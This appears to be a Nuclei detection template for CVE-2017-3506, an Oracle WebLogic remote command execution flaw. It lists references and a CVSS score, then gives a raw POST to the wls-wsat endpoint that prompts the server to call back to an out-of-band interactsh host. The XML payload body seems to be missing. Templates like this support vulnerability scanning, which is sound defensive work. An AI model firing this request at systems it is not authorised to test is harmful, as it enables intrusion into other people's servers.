id: CVE-2017-3506 info: name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution author: pdteam severity: high description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html - http://web.archive.org/web/20210124033731/https://www.securityfocus.com/bid/97884/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 7.4 cve-id: CVE-2017-3506 tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle metadata: max-request: 1 http: - raw: - | POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Content-Type: text/xml;charset=UTF-8 http://{{interactsh-url}} matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"